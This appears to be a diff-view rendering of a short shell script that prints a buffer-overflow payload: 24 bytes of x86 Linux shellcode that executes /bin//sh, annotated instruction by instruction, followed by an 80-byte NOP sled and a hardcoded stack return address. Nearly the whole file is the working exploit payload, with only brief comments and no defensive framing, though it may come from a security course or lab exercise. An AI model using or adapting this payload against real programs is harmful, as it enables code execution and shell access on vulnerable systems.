equal
deleted
inserted
replaced
1 #!/bin/sh |
|
2 |
|
3 # shellscript that overwrites the buffer with |
|
4 # some payload for opening a shell (the payload |
|
5 # cannot contain any \x00) |
|
6 |
|
7 |
|
8 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
|
9 |
|
10 # 24 bytes of shellcode |
|
11 |
|
12 # "\x31\xc0" // xorl %eax,%eax |
|
13 # "\x50" // pushl %eax |
|
14 # "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e |
|
15 # "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f |
|
16 # "\x89\xe3" // movl %esp,%ebx |
|
17 # "\x99" // cltd |
|
18 # "\x52" // pushl %edx |
|
19 # "\x53" // pushl %ebx |
|
20 # "\x89\xe1" // movl %esp,%ecx |
|
21 # "\xb0\x0b" // movb $0xb,%al |
|
22 # "\xcd\x80" // int $0x80 |
|
23 |
|
24 padding=`perl -e 'print "\x90" x 80'` |
|
25 |
|
26 # need s correct address in order to run |
|
27 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
|
28 |
|